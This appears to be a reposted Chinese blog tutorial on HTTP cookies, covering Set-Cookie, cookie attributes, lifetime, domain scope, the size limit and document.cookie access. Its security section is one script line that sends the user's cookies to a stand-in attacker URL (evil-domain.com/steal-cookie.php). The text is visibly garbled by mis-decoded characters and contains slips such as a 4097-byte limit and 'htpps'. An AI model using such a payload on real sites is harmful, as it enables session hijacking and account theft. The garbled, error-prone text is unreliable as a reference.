摘要:瀏覽器收到響應(yīng)后通常會保存下�����,之后對該服務(wù)器每一次請求中都通過請求頭部將信息發(fā)送給服務(wù)器�����。另外����,的過期時間域路徑有效期適用站點都可以根據(jù)需要來指定�。存儲大小個字節(jié),多了瀏覽器會默默刪掉訪問安全問題
目錄
創(chuàng)建
組成
生命周期
作用域
存儲大小
創(chuàng)建Cookie
當(dāng)服務(wù)器收到HTTP請求時���,服務(wù)器可以在響應(yīng)頭里面添加一個Set-Cookie選項���。
瀏覽器收到響應(yīng)后通常會保存下Cookie����,
之后對該服務(wù)器每一次請求中都通過Cookie請求頭部將Cookie信息發(fā)送給服務(wù)器�。
另外,Cookie的過期時間��、域����、路徑、有效期�����、適用站點都可以根據(jù)需要來指定�。
服務(wù)器使用Set-Cookie響應(yīng)頭部向用戶代理(一般是瀏覽器)發(fā)送Cookie信息。一個簡單的Cookie可能像這樣:
Set-Cookie: =
response.setHeader("Set-Cookie", ["type=ninja","username=123qad"����, "language=javascript"]);
組成
Name
Value
Domain
Path
Expires/ Max-Age 過期時間
Size
Http
Secure 是否加密,標(biāo)記為Secure 只會通過 htpps 協(xié)議傳輸, http 是不能設(shè)置的
SameSite
組成
生命周期
默認(rèn)是瀏覽器關(guān)閉就清掉���, 一般會設(shè)置 指定過期時間(Expires)或者有效期(Max-Age)
需要注意的是��,有些瀏覽器提供了會話恢復(fù)功能���,這種情況下即使關(guān)閉了瀏覽器���,會話期Cookie也會被保留下來,就好像瀏覽器從來沒有關(guān)閉一樣�。
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT;
作用域
Domain (域名)和 Path 標(biāo)識定義了Cookie的作用域:即Cookie應(yīng)該發(fā)送給哪些URL。
Cookie 的Domain 屬性可以設(shè)置 Cookie 發(fā)送哪些 url�����,默認(rèn)是在當(dāng)前域名下��,但有時候我們可能幾個站點想共享Cookie 信息
比方 qq空間(qq.tentxun.com)登陸了�,我想點進(jìn) qq 郵箱(mail.tenxun.com), 那要是再登陸一次����,用戶爸爸肯定受不了,所以通過設(shè)置
cookie 的 domain 為 ".tenxun.com",從 qq空間點擊鏈接 進(jìn)入 qq 郵箱���, qq郵箱 通過 cookie 信息����,獲取用戶信息��,就可以不用再次登陸了
如果設(shè)置 Domain=mozilla.org���,則Cookie也包含在子域名中(如developer.mozilla.org)��。
存儲大小
4097個字節(jié)�����, 多了瀏覽器會默默刪掉
javascript 訪問 Cookie
var cookie = document.cookie;
document.cookie = "username=tt";
安全問題
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
文章版權(quán)歸作者所有��,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為�����,您可以聯(lián)系管理員刪除��。
轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/96162.html
